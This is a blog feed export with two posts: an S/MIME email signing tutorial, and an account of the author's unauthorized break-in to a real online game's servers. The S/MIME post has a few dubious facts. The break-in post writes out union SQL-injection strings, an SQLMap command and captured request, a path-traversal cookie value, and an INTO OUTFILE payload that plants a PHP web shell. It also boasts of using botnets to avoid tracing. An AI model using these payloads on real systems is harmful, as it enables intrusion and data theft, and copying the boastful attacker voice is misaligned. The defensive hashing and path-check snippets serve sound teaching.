		<category><![CDATA[email]]></category>
		<category><![CDATA[Encrypt Email with Thunderbird]]></category>
		<category><![CDATA[Encrypted e-mail]]></category>
		<category><![CDATA[Encrypted Email]]></category>
		<category><![CDATA[Free Email Certificate]]></category>
		<category><![CDATA[Howto]]></category>
		<category><![CDATA[Mail Client]]></category>
		<category><![CDATA[Mail Server]]></category>
		<category><![CDATA[MIME]]></category>
		<category><![CDATA[Mozilla Thunderbird]]></category>
		<category><![CDATA[Public Key Cryptography]]></category>
		<category><![CDATA[S/MIME]]></category>
		<category><![CDATA[Seal Email]]></category>
		<category><![CDATA[Sign Email with Thunderbird]]></category>
		<category><![CDATA[Signed e-mail]]></category>
		<category><![CDATA[Signed Email]]></category>
		<category><![CDATA[Thunderbird Security]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=718</guid>
		<description><![CDATA[This is intended to be a theoretical/practical tutorial on how to use email certificates to encrypt and digitally sign your emails. There are approximately 2 million emails transferred every hour, out of which 80% are spam, and the email world is really creepy, so I strongly recommend you to read the rest of this post. [...]]]></description>
				<content:encoded><![CDATA[<p dir="ltr">This is intended to be a theoretical/practical tutorial on how to use email certificates to encrypt and digitally sign your emails. There are approximately 2 million emails transferred every hour, out of which 80% are spam, and the email world is really creepy, so I strongly recommend that you read the rest of this post.</p>
<p dir="ltr">First of all, let&#8217;s cover some theory. There are three Internet protocols involved in sending and receiving emails: <strong><a href="http://en.wikipedia.org/wiki/Smtp">SMTP</a>, <a href="http://en.wikipedia.org/wiki/Imap">IMAP</a>, <a title="Post Office Protocol" href="http://en.wikipedia.org/wiki/Pop3">POP</a></strong></p>
<p dir="ltr"><strong>S</strong>imple <strong>M</strong>ail <strong>T</strong>ransfer <strong>P</strong>rotocol is the one responsible for sending emails. An email client &#8211; where you compose your email, set recipients, attach files, etc. &#8211; sends your email data to a mail server via SMTP. The protocol is fairly simple and the only things worth mentioning are that it can run over SSL (an encrypted connection to the server to transfer mail) and can use password authentication to separate accounts.</p>

<h3 dir="ltr">Practical Scenario: GMail</h3>
<p dir="ltr">Most of us have used GMail, by creating an account at gmail.com and logging in there. It is very important to know that gmail.com is the GMail client, and smtp.gmail.com is the GMail server. When you log into GMail, you access its client application and do your work there. Since both client and server applications are on the same machines (Google&#8217;s servers), your work is quickly sent to the server; that&#8217;s why you usually don&#8217;t notice.</p>
<p dir="ltr">Everybody can set up a mail server on their machine. Famous mail server applications are Microsoft Outlook for Windows and <a title="Exim4" href="http://www.exim.org/">Exim</a> and <a href="http://www.postfix.org/">Postfix</a> for Linux machines. GMail uses neither and has a custom-coded server. You don&#8217;t need to provide a password to a mail server, nor do you have accounts there. You can send <strong>any email</strong> from any server to any server, i.e. you can send email from admin@facebook.com with any body you want to me@abiusx.com. It&#8217;s just a packet of data with a name on it (just like ordinary mail).</p>
<p dir="ltr">Famous servers like GMail, which deal with millions of users and lots of spam, implement technologies that require you to log in, have accounts and do things lawfully. Other servers don&#8217;t. Mail that doesn&#8217;t follow the rules of GMail and other famous mail servers is usually treated as spam.</p>

<h3 dir="ltr">Back to the theory</h3>
<p dir="ltr"><strong>POP</strong>, usually used as POP3, is the old-school mail receiving protocol. The mail client uses this protocol to download all mail from the server. The protocol is very handicapped and weak, much like <a href="http://en.wikipedia.org/wiki/FTP">FTP</a>.</p>
<p dir="ltr"><strong>IMAP</strong>, on the other hand, is a fairly recent and powerful mail receiving protocol, so basically POP and IMAP are alternatives to each other. There were days when not many mail servers provided IMAP to their clients; now almost every mail server provides full IMAP support. GMail&#8217;s IMAP is accessible at imap.gmail.com (keep in mind that this is the domain for the IMAP protocol, not HTTP, so pointing your browser at it would not bring up anything).</p>
<p dir="ltr"><span id="more-718"></span></p>
<p dir="ltr" style="text-align: center;">* * *</p>
<p dir="ltr" style="text-align: left;">Today, many important interactions are done electronically. You can even buy cars online, and all of this involves some emailing. The providers email you your balance sheet, your username/password, your instructions for your education, your contest results and many other things.</p>

<h3 dir="ltr">Theory: The problem(s)</h3>
<p dir="ltr" style="text-align: left;"><strong>1. </strong>Now consider that something bad happens, such as a hacker forging an email from your university telling you that you&#8217;re fired and cannot continue your education, or that you need to pay a certain amount of money to a certain bank account. You have no way of telling if it&#8217;s legit (sent by the university) or fake (remember, email is just mail in bytes, and as forgeable as mail).</p>
<p dir="ltr" style="text-align: left;"><strong>2. </strong>The other bad thing that might happen is that eavesdroppers, and even your mail provider, could read your mail and extract content from it. You can be quite certain that every picture, every piece of information, every Word document and everything else you send through GMail is deeply analyzed by Google and stored to be handed over to the CIA, NSA, etc. It doesn&#8217;t matter whether your own email is @gmail.com or your recipient&#8217;s; either way your email passes through GMail servers.</p>
<p dir="ltr" style="text-align: left;">Even if you have your own mail server (like my mail.abiusx.com), when you send/receive email, your message passes through many mail relays around the globe, and they seem to do the same analysis.</p>

<h3 dir="ltr">Theory: The solution</h3>
<p dir="ltr">To stop forgery, you need to actually prevent two things: Manipulation of your message headers (who it is from) and manipulation of your message content (what it contains).</p>
<p dir="ltr"><a href="http://en.wikipedia.org/wiki/Digital_signature">Digital Signature</a> is the well-known solution, which provides both <a href="http://en.wikipedia.org/wiki/Authentication">Authenticity</a> (proving who the signature really belongs to) and <a href="http://en.wikipedia.org/wiki/Data_integrity">Integrity</a> (not a single dot in the message is changed). The mechanics of digital signatures are quite complex, but they rely on Public Key Cryptography.</p>
<p dir="ltr"><a href="http://en.wikipedia.org/wiki/Public_key_cryptography">Public Key Cryptography</a> provides us with a system having a pair of keys, the Private Key and the Public Key. Everything that is locked with either is only unlockable by the other, e.g. if you encrypt a message with someone&#8217;s public key, the message can only be decrypted by his private key, which is in fact only in his own hands.</p>
<p dir="ltr">Unfortunately, to use anything related to Public Key Cryptography, we need to use <a href="http://en.wikipedia.org/wiki/Public_key_infrastructure">PKI</a> (Public Key Infrastructure), and to use PKI, we need to obtain an SSL Certificate (which contains our information and our public key, but not our private key). SSL Certificates are considered a luxury and are quite expensive for individuals (approximately $100 a year for every single use case).</p>
<p dir="ltr">Fortunately, <a href="http://comodo.com/">Comodo</a> is providing free email certificates so that everybody can send digitally signed emails.</p>
<p dir="ltr">To handle the second problem, we need encryption. We have to encrypt our email body in a way that only our final target can decrypt and read it. Since email is not live, we can&#8217;t agree on a particular key and transfer data encrypted with it, and more importantly, our target usually is not aware that we are sending him an email.</p>
<p dir="ltr">To encrypt the message in a way that only our specific target can read it, we need to have his public key (which is included in his certificate) and encrypt the message with it, ensuring that only he himself can decrypt it with his private key. Unfortunately, there is no online database having the certificates of all email addresses, so we need a means to obtain our target&#8217;s certificate before we can send him encrypted messages.</p>
<p dir="ltr">This is particularly easy, considering every digitally signed message contains a copy of the signer&#8217;s certificate at the bottom, so if we are using a modern mail client (2010+, when <a href="http://en.wikipedia.org/wiki/SMIME">S/MIME</a> was standardized by the IETF) and we receive a digitally signed email from someone, and we ourselves have a digital certificate (to sign our own messages), our mail client automatically stores that &#8220;someone&#8217;s&#8221; certificate so that from then on we can send him encrypted emails.</p>
<p dir="ltr">Now enough with the theory babble, off to enjoying the real deal:</p>

<h3 dir="ltr">Practice: Let&#8217;s send and receive encrypted, signed email</h3>
<p dir="ltr">First of all, we have to <strong>have a modern mail client</strong>. Unfortunately, neither GMail&#8217;s nor Yahoo&#8217;s web-based clients support S/MIME yet. I strongly recommend the mighty <a title="Download Thunderbird" href="http://www.mozilla.org/en-US/thunderbird/">Mozilla Thunderbird</a>, the best mail client I have seen after Apple&#8217;s Mail (which only runs on a Mac).</p>
<p dir="ltr">After downloading Thunderbird, we can at least see whether a message is digitally signed, and whether its signature is valid or not. With GMail&#8217;s and Yahoo&#8217;s web-based clients, we only see a downloadable smime.p7s file!</p>
<p dir="ltr">The first time Thunderbird starts up, it asks for your email account credentials. Keep in mind that you cannot use free Yahoo mail with Thunderbird or any other mail client (other than Yahoo&#8217;s web site), since they do not provide free POP3 or IMAP. Any other mail service is fine. After you enter your email credentials, Thunderbird automatically lists all your email settings, folders, and messages. There are also plenty of options to suit your particular needs. Now whenever you receive new email, Thunderbird informs you and you can easily see it, without the need to open a browser or even go online.</p>
<p dir="ltr">The next step is to <strong>obtain an email certificate</strong> for our own email address. As I stated earlier in this post, Comodo is providing them for free to encourage secure email practice at:</p>
<p dir="ltr" style="text-align: center;"><a title="Comodo Free E-Mail Certificate" href="http://www.comodo.com/home/email-security/free-email-certificate.php">http://www.comodo.com/home/email-security/free-email-certificate.php</a></p>
<p dir="ltr" style="text-align: left;">The only thing that you have to enter correctly there is your email address. All other fields are mandatory for an X.509 certificate but are not checked against anything. After you fill in the form, an email is sent to you containing a link to receive your certified certificate. I suggest you visit this link with Mozilla Firefox; it makes things a hell of a lot easier.</p>
<p dir="ltr" style="text-align: left;">You need to add this certificate to your system. If you&#8217;re using a Mac, it will be added to your Keychain, but on Windows every application keeps its own list of certificates, and the operating system does the same. When you open the link in Firefox, a dialog pops up telling you that the certificate was successfully installed. Now you need to go to Tools -&gt; Options -&gt; Advanced -&gt; Encryption -&gt; View Certificates -&gt; Your Certificates, select it from the list, click Backup and save it somewhere on your computer inside a .p12 file (PKCS#12 format). You need to provide a password to encrypt the file, since it contains your private key as well as your certificate. Keep in mind NOT to give this file to anyone, or they can legitimately forge you.</p>
<p dir="ltr" style="text-align: left;">Now in Thunderbird, go to Tools -&gt; Options -&gt; Advanced -&gt; Certificates -&gt; View Certificates -&gt; Your Certificates, press Import and select the file you just exported. You need to enter the password you used to encrypt it, and once it is imported into Thunderbird, you&#8217;re all set.</p>
<p dir="ltr" style="text-align: left;">Now open a new mail window, click on the Security arrow in the toolbar and click on &#8220;Digitally Sign This Message&#8221;. A seal icon is added to the bottom right of your message. You can&#8217;t encrypt your message yet, since you haven&#8217;t stored anyone else&#8217;s public key in your Thunderbird. I suggest you send me your signed email, and I&#8217;ll reply with my signed email, so you will have my public key and can send me encrypted email afterwards.</p>
<p dir="ltr" style="text-align: left;"><strong>Note:</strong> The first time you click on &#8220;Digitally Sign This Message&#8221; there&#8217;s a question asking you to setup certificates for your email address. Click yes and select your imported certificate from the list. This is necessary since Thunderbird can handle plenty of mail addresses at the same time, and has to know which certificate belongs to which one.</p>
<p dir="ltr" style="text-align: left;">Have fun sending/receiving signed and sealed email!</p>
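<p dir="ltr" style="text-align: left;">The theory above (sign, verify, pick the signer&#8217;s certificate out of a signed message, then encrypt to it) and the .p12 backup step, done with the openssl command line instead of Thunderbird, as an added example that is not part of the original post. It assumes openssl is on the PATH; &#8220;alice&#8221; and &#8220;bob&#8221; at example.test are constructed identities with self-signed certificates, standing in for Comodo-issued ones.</p>

```shell
#!/bin/sh
# Added example (not from the original post): the S/MIME exchange described
# above, done with the openssl command line. "alice" and "bob" are constructed
# identities with self-signed certificates; a CA-issued certificate (such as
# the Comodo one) would only replace the .crt files.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Key pair plus self-signed certificate for one mailbox.
make_identity() {   # name email
    openssl req -x509 -newkey rsa:2048 -nodes -days 30 \
        -keyout "$WORK/$1.key" -out "$WORK/$1.crt" \
        -subj "/CN=$1/emailAddress=$2" >/dev/null 2>&1
}

# The post's "Backup" step: certificate and private key in one password
# protected PKCS#12 file (the password is a constructed sample).
export_p12() {      # name password
    openssl pkcs12 -export -inkey "$WORK/$1.key" -in "$WORK/$1.crt" \
        -out "$WORK/$1.p12" -passout "pass:$2"
}

# True when the backup opens with the password and contains the private key,
# which is exactly why the file must never be handed to anyone.
p12_has_private_key() {   # name password
    openssl pkcs12 -in "$WORK/$1.p12" -passin "pass:$2" -nocerts -nodes 2>/dev/null \
        | grep -q 'PRIVATE KEY'
}

# Sign: output is multipart/signed with a detached smime.p7s part, and the
# PKCS#7 structure carries the signer's certificate.
sign_message() {    # signer infile outfile
    openssl smime -sign -signer "$WORK/$1.crt" -inkey "$WORK/$1.key" \
        -in "$2" -out "$3"
}

# Verify signature and chain against a trust anchor; the original text is
# written to outfile on success, non-zero exit on any modification.
verify_message() {  # infile anchor outfile
    openssl smime -verify -in "$1" -CAfile "$2" -out "$3" >/dev/null 2>&1
}

# Harvest the signer's certificate from a signed message: the step a mail
# client does automatically so it can encrypt to that correspondent later.
extract_signer_cert() {   # signed outcert
    openssl smime -pk7out -in "$1" | openssl pkcs7 -print_certs \
        | openssl x509 -out "$2"
}

encrypt_message() { # infile outfile recipient_cert
    openssl smime -encrypt -aes256 -in "$1" -out "$2" "$3"
}

decrypt_message() { # infile outfile recipient_name
    openssl smime -decrypt -in "$1" -out "$2" \
        -recip "$WORK/$3.crt" -inkey "$WORK/$3.key" 2>/dev/null
}

# Whole exchange: Alice signs, Bob verifies and keeps her certificate, Bob
# encrypts a reply that only Alice can open. Prints "ok" if every check holds.
run_demo() {
    make_identity alice alice@example.test
    make_identity bob   bob@example.test
    export_p12 alice 'constructed-backup-password'
    p12_has_private_key alice 'constructed-backup-password' || return 1

    printf 'Meet at noon. (constructed sample message)\n' > "$WORK/msg.txt"
    sign_message alice "$WORK/msg.txt" "$WORK/signed.eml"

    # Self-signed demo: Bob trusts Alice's certificate directly. With a CA
    # issued certificate the anchor would be the CA certificate instead.
    verify_message "$WORK/signed.eml" "$WORK/alice.crt" "$WORK/verified.txt" || return 1
    grep -q 'Meet at noon' "$WORK/verified.txt" || return 1

    # Integrity: changing one word of the signed text breaks verification.
    sed 's/noon/night/' "$WORK/signed.eml" > "$WORK/tampered.eml"
    if verify_message "$WORK/tampered.eml" "$WORK/alice.crt" "$WORK/junk.txt"; then
        return 1
    fi

    # Bob now holds Alice's public key and can encrypt to her.
    extract_signer_cert "$WORK/signed.eml" "$WORK/alice_from_mail.crt"
    printf 'Confirmed. (constructed reply)\n' > "$WORK/reply.txt"
    encrypt_message "$WORK/reply.txt" "$WORK/reply.eml" "$WORK/alice_from_mail.crt"
    if grep -q 'Confirmed' "$WORK/reply.eml"; then return 1; fi   # no plaintext leak
    decrypt_message "$WORK/reply.eml" "$WORK/reply_plain.txt" alice
    grep -q 'Confirmed' "$WORK/reply_plain.txt" || return 1

    # Confidentiality: Bob's own key cannot open a message encrypted to Alice.
    if decrypt_message "$WORK/reply.eml" "$WORK/junk2.txt" bob; then
        return 1
    fi
    echo ok
}

run_demo
```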
<p dir="ltr" style="text-align: left;"><strong>Edit 1:</strong></p>
In case you&#8217;re using this with Apple Mail.app, you have to provide your admin password every time you send a signed mail. That&#8217;s because Mail.app needs to access your private key (in Keychain Access) to sign a message.

To fix this, follow the guides in this post: <a href="https://abiusx.com/certified-e-mail-with-comodo-and-thunderbird/">https://abiusx.com/certified-e-mail-with-comodo-and-thunderbird/</a>
<p dir="ltr" style="text-align: left;"><strong>Edit 2:</strong></p>
<p dir="ltr" style="text-align: left;">You should do all the steps using Firefox (whether you&#8217;re using Mail.app or Thunderbird). When you visit the initial certificate creation page, COMODO creates a private key and stores it in your browser, so after you get the email you should open it in the same browser, or you would see an error (private key not found). Also, Firefox has the easiest backup feature.</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/certified-e-mail-with-comodo-and-thunderbird/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>How the browser MMO and CodeIgniter Hacked</title>
		<link>http://abiusx.com/asmandez-codeigniter-hacked/</link>
		<comments>http://abiusx.com/asmandez-codeigniter-hacked/#comments</comments>
		<pubDate>Sun, 05 Feb 2012 16:33:24 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Blind SQL Injection]]></category>
		<category><![CDATA[CodeIgniter]]></category>
		<category><![CDATA[CodeIgniter bug]]></category>
		<category><![CDATA[CodeIgniter Hacking]]></category>
		<category><![CDATA[CodeIgniter Remote File Inclusion]]></category>
		<category><![CDATA[CodeIgniter Security Flaw]]></category>
		<category><![CDATA[CodeIgniter vulnerability]]></category>
		<category><![CDATA[File Inclusion]]></category>
		<category><![CDATA[Forgot password]]></category>
		<category><![CDATA[ForgotPassword security flaw]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Hacking Scenario]]></category>
		<category><![CDATA[Hacking Tutorial]]></category>
		<category><![CDATA[Hash Cracking]]></category>
		<category><![CDATA[hash Salt]]></category>
		<category><![CDATA[help.asmandez.ir]]></category>
		<category><![CDATA[hex bypassing]]></category>
		<category><![CDATA[INTO OUTFILE]]></category>
		<category><![CDATA[Learn Hacking]]></category>
		<category><![CDATA[Learn information security]]></category>
		<category><![CDATA[MySQL]]></category>
		<category><![CDATA[MySQL Into Outfil]]></category>
		<category><![CDATA[PHP Framework]]></category>
		<category><![CDATA[remote terminal]]></category>
		<category><![CDATA[Security Salt]]></category>
		<category><![CDATA[Session Hijacking]]></category>
		<category><![CDATA[SessionID]]></category>
		<category><![CDATA[SHA1]]></category>
		<category><![CDATA[SHA512]]></category>
		<category><![CDATA[shell access]]></category>
		<category><![CDATA[shell upload]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[SQLMap]]></category>
		<category><![CDATA[UNION Bypassing]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[WebScarab]]></category>
		<category><![CDATA[WhiteHat]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=696</guid>
		<description><![CDATA[This one is intended to be an educational/tutorial post on how I hacked an MMORPG web browser Persian game known as Removed From Text and along with it, the well known PHP framework CodeIgniter used for developing it. Reading this might help you learn a thing or two about information security. First of all, you&#8217;re [...]]]></description>
				<content:encoded><![CDATA[<p dir="ltr">This one is intended to be an educational/tutorial post on how I hacked a Persian browser-based MMORPG web game known as <del>Removed From Text</del> and, along with it, the well-known PHP framework CodeIgniter used for developing it. Reading this might help you learn a thing or two about information security.</p>
<p dir="ltr">First of all, you&#8217;re not encouraged at all to do anything against <del>Removed From Text</del>.com or any other CodeIgniter powered website using this technique or any equivalent technique. I am a world-class professional hacker and it&#8217;s practically impossible to track my actions on the Internet, I use well implemented anonymity/privacy networks and BOTNETs to perform my tasks and infiltrate systems in a way that&#8217;s very hard to detect.</p>
<p dir="ltr">Defacing any website &#8211; for any purpose &#8211; and/or stealing its private data is a felony under international treaties and is therefore highly condemned. The intent of this article is only educational.</p>
<p dir="ltr">* * *</p>

<h3 dir="ltr">Finding the vulnerability</h3>
<p dir="ltr">A few days ago, I visited <del>Removed From Text</del> to play an online web-based browser game which is purely Persian. I was well aware of the game and its developers, since I was the coordinator for their participation in the 3rd Digital Media Fair of Tehran. I played for a while, and started thinking this might take a long time, so I decided to cheat.</p>
<p dir="ltr">Probing the site and its features for a while, I found an <a title="SQL Injection" href="http://en.wikipedia.org/wiki/Sql_injection">SQL Injection</a> vulnerability in its &#8220;Forgot Password&#8221; feature. It&#8217;s worth noting that SQL Injection vulnerabilities are usually found in the least attended, most obsolete sections of a website, like a small polling dialog or a forgot-password dialog.</p>
<p dir="ltr">The vulnerability, which can be seen at<a href="http://asmandez.ir/main/forgetPassword"> http://<del>Removed From Text</del>.ir/main/forgetPassword</a> by entering <strong>foo</strong> as the username and <strong>1&#8242; morgh</strong> as the password, brings up the following dialog at <a href="http://uc.asmandez.com/index.php/forget/index">http://uc.<del>Removed From Text</del>.com/index.php/forget/index</a>:</p>

<blockquote>
<div id="container" dir="ltr">
<h1>A Database Error Occurred</h1>
Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#8216;morgh&#8221; at line 1 SELECT `uid` FROM uc_users WHERE username=&#8217;foo&#8217; and email=&#8217;1&#8242; morgh&#8217; Filename: /var/www/universalcommander/models/forgetmodel.php Line Number: 17

<span id="more-696"></span>

</div></blockquote>
<div id="container" dir="ltr">

It&#8217;s actually a nice one, and seems to allow visible SQL Injection attacks that could pull out the entire application database, but it doesn&#8217;t (only because of a programmer&#8217;s bug which came to save them here); I&#8217;ll describe the reason in a while. Googling the error reveals that the infrastructure used in the site is in fact the famous PHP framework <a title="CodeIgniter bug" href="http://codeigniter.com/">CodeIgniter</a>. One might think that well-known, highly used PHP frameworks are bug free, but that&#8217;s not entirely true, as we shall see in the rest of this post. Replacing the entered email <strong>1&#8242; morgh</strong> with <strong>1&#8242; and 1=0 union select 1 &#8211;</strong> (note: there&#8217;s a space after &#8212;, and also &#8216; is a single quote; WordPress tends to change it) to perform union-bypass SQL Injection results in the following error:
<blockquote>
<div id="container">
<h1>A Database Error Occurred</h1>
Error Number: 1222 The used SELECT statements have a different number of columns SELECT `uid` , `username`, `email` FROM uc_users WHERE username=&#8217;foo&#8217; and email=&#8217;1&#8242; and 1=0 union select 1 &#8212; &#8216; Filename: /var/www/universalcommander/models/forgetmodel.php Line Number: 11

</div></blockquote>
<div id="container">

Oddly, this error is not about the same SQL query as above! This one is the same, but with the difference that it asks for 3 columns as the result. This makes us unable to perform <a title="Union Bypassing SQL injection" href="http://hakipedia.com/index.php/SQL_Injection#UNION_Statements">union bypassing</a>, since one of the queries asks for 1 column and the other asks for 3, and we can only inject both in the same way; we can&#8217;t ask for select 1,2,3 and select 1 at the same time (union requires both sides to have the same number of columns). Unfortunately, the programmers here have done something illogical which has prevented us from hacking this system and left us with only a <a title="Blind Injection" href="http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection">Blind Injection</a> vulnerability. Blind injections are much weaker and much slower, yet employing a powerful tool such as <a title="SQLMap" href="http://sqlmap.sourceforge.net/">SQLMap</a> I was able to run every <em>SELECT</em> query I desired on the server.
<h3 dir="ltr">Exploiting the vulnerability</h3>
Since CodeIgniter restricts the characters allowed in URI segments (its permitted_uri_chars setting) and, depending on the version, discards $_GET entirely, I only probed POST parameters. The vulnerability described above is also a POST SQL injection. To exploit a POST vulnerability with SQLMap you give it a captured HTTP request in a file (the -r switch):
<blockquote>POST /index.php/forget/index HTTP/1.1
Host: uc.<del>Removed From Text</del>.com
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded

username=abiusx&amp;email=hacked@abiusx.com</blockquote>
With the following command line:
<blockquote>sudo python sqlmap.py -r requestfile.txt --sql-query="PUT YOUR QUERY HERE" --dump</blockquote>
And SQLMap will do the rest, using blind injection to return the result of your query. You can also use the --tables, --dbs, --passwords and similar switches to have SQLMap enumerate the corresponding database objects for you.
<h3 dir="ltr">Sapping some critical data</h3>
At this point there are two kinds of information of extreme value for continuing to elevate our access: first, usernames and passwords; second, session data. Other data is of little use since we can only run SELECT queries and cannot change anything in the database. We have to find administrator users and get hold of their passwords, so that we can elevate ourselves and work inside the system at the administrative level.

There is a well-established security practice that you should store only hashes of passwords (one-way digests) in your database, never the actual passphrases. <a href="http://en.wikipedia.org/wiki/Cryptographic_hash_function">Hashes</a> are meant to be irreversible, and each time a user logs in the hash is recomputed and compared with the one stored in the database. Unfortunately, most Iranian developers do not follow this practice and store the original passwords, so a hacker who finds a simple SQL injection learns every user's password, and most users reuse the same password everywhere.

That was not the case here: the <del>Removed From Text</del> developers used hashes, and not just a fast hash such as MD5 (one-way, but cheap to brute-force), but SHA512 with <a href="http://en.wikipedia.org/wiki/Salt_(cryptography)">salting</a>, so a hacker cannot simply look the hashes up in a precomputed table. (A salted fast hash still yields to a determined offline attack on weak passwords; a deliberately slow password hash would have been better still.) To make matters worse, my favourite supercomputing service for breaking hashes (passcracking.ru) was also unavailable at the time. Having failed to obtain any passwords, I went after session information. First I logged into the website with my own user, changed my IP, and refreshed the page. Bingo: the site does not tie a session to the client IP, so with another user's session ID I could use their session while they were logged in, and the system would not notice. To do some <a href="http://en.wikipedia.org/wiki/Session_hijacking">session hijacking</a> all I needed was a session ID. I combed through all the database tables looking for sessions, but found none. This surprised me so much, as nobody keeps sessions in files these days, that I started doubting I was hacking the right server.
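Password storage as the two paragraphs above describe it, written out in Python as an added example (not the game's code): the "strong" salted SHA512 the site used beside a deliberately slow, salted derivation, with the verify step that recomputes and compares. The iteration count and the fixed demo salt are assumptions.

```python
import hashlib
import hmac
import os

# Assumption: tune so one verification costs tens of milliseconds on the login host.
ITERATIONS = 200_000


def fast_salted_sha512(password, salt):
    """What the post calls 'strong': one salted SHA-512 round. The salt defeats
    precomputed tables, but an attacker can still try hundreds of millions of
    guesses per second per GPU against a leaked hash."""
    return hashlib.sha512(salt + password.encode()).hexdigest()


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, deliberately slow hash; the stored string carries its own parameters."""
    if salt is None:
        salt = os.urandom(16)                       # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return "pbkdf2_sha512$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != "pbkdf2_sha512":
        return False
    candidate = hashlib.pbkdf2_hmac("sha512", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def demo():
    salt = b"\x00" * 16                             # fixed salt only for a deterministic demo
    return {
        "fast": fast_salted_sha512("correct horse", salt),
        "slow": hash_password("correct horse", salt, iterations=1000),
        "distinct_salts_differ": hash_password("x", iterations=1000)
                                 != hash_password("x", iterations=1000),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Storing the iteration count with the hash lets the cost be raised later without invalidating existing users: their records are simply re-hashed at the next successful login.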
<h3 dir="ltr">My share of disappointment</h3>
I checked the count of users, and it matched. I checked some other things and it seemed that some of the game's data was not in any of the databases, and there were many databases. That's when I started doing this in a terminal:
<blockquote>dig s2.<del>Removed From Text</del>.ir

dig s4.<del>Removed From Text</del>.ir

dig <del>Removed From Text</del>.com</blockquote>
</div>
<div id="container">Bingo! These sites are not hosted on the same server. I had been hacking the wrong server all this time! I switched to the other server, the actual game server, and found that its "ForgotPassword" feature is protected by <a href="http://en.wikipedia.org/wiki/CAPTCHA">reCAPTCHA</a>. Now I was doomed, since blind injection depends on thousands of automated requests and each one would need a freshly solved CAPTCHA.</div>
<div></div>
<div>But I wouldn&#8217;t give up, since if there&#8217;s a single vulnerability in a website, there is indeed another.</div>
</div>
<div></div>
<div dir="ltr">Looking for other, less-visited features of the website, I found that it has i18n (internationalization) and offers both English and Persian versions. i18n is a tricky feature, and since it is not widely used or well tested, it usually has bugs here and there.</div>
<div dir="ltr">I watched the i18n feature through <a href="http://en.wikipedia.org/wiki/WebScarab">WebScarab</a> and found that clicking the Iran flag sends "FA" to the server and clicking the UK flag sends "EN". What if I sent something else on purpose? Since the application seemed to keep the language preference in a cookie, I used FireBug+FireCookie to change my "Language" cookie from "Farsi" to "Morgh", and voila:</div>
<blockquote>
<div dir="ltr">
<div id="content">
<h1>An Error Was Encountered</h1>
Unable to load the requested language file: language/morgh/general_lang.php

</div>
</div></blockquote>
<div dir="ltr">
<div id="content">

What does this mean? Language phrases are stored in files under a folder named after the language, e.g. Farsi strings live in "language/farsi/*". The error shows that my cookie value is used, unchecked, as a path component, which opens up a <a href="http://en.wikipedia.org/wiki/Remote_file_inclusion">file inclusion</a> attack by directory traversal. From the earlier error I knew the files were stored in <strong>/var/www/<del>Removed From Text</del>/application/language/farsi/</strong>. Now all I had to do was place my code somewhere on the server (the hard part) and point the language loader at it. This time I changed the language from <strong>morgh</strong> to <strong>../../../../../tmp/</strong>, so that the language path became:
<blockquote>/var/www/<del>Removed From Text</del>/application/language/../../../../../tmp/general_lang.php</blockquote>
Which is in fact in terms of operating system paths:
<blockquote>/tmp/general_lang.php</blockquote>
I chose /tmp because it is world-writable, so getting a file there would be much easier. (Writing it through MySQL, as below, also depends on the database account having the FILE privilege, which the game's root account did.)
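The path arithmetic above, and the check the loader should have made, as an added Python example (the real loader is CodeIgniter's PHP; this is a model, not its code). The base directory is an assumption modelled on the path in the error message, with the site name replaced by "app":

```python
import posixpath

# Assumption: the application's language directory, modelled on the path in the
# post's error message with the site name replaced.
LANG_BASE = "/var/www/app/application/language"


def vulnerable_language_file(language, name="general_lang.php"):
    """Mirror the loader's behaviour: the cookie value becomes a path component."""
    return posixpath.normpath(posixpath.join(LANG_BASE, language, name))


# Languages the application actually ships; anything else is rejected outright.
ALLOWED_LANGUAGES = {"english", "farsi"}


def escapes_base(path):
    """True when a resolved path lies outside LANG_BASE. On a real system resolve
    symlinks first (os.path.realpath); this version only normalises '..'."""
    return posixpath.commonpath([posixpath.normpath(path), LANG_BASE]) != LANG_BASE


def safe_language_file(language, name="general_lang.php"):
    """Allowlist first; then verify the resolved path is still inside LANG_BASE.
    The second check is redundant while the allowlist holds, but it also
    catches future code that builds the path from other untrusted input."""
    if language not in ALLOWED_LANGUAGES:
        raise ValueError("unknown language: %r" % language)
    path = posixpath.normpath(posixpath.join(LANG_BASE, language, name))
    if escapes_base(path):
        raise ValueError("path escapes language directory: %s" % path)
    return path


if __name__ == "__main__":
    for cookie in ("farsi", "morgh", "../../../../../tmp/"):
        print("%-22s -> %s" % (cookie, vulnerable_language_file(cookie)))
```

Five "../" components are exactly enough to climb from the five-deep language directory to "/", which is why the cookie value in the post resolves to /tmp/general_lang.php.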
<h3 dir="ltr">MySQL is much better than MS SQL, yet not impenetrable</h3>
As I said before, the CAPTCHA stopped me from running automated blind injection against this server, but a single hand-crafted query could still be injected and executed. Out of all possible queries, I chose this one:
<blockquote>' and 1=0 union select "&lt;?php echo shell_exec($_REQUEST[q]); " into outfile "/tmp/general_lang.php" -- </blockquote>
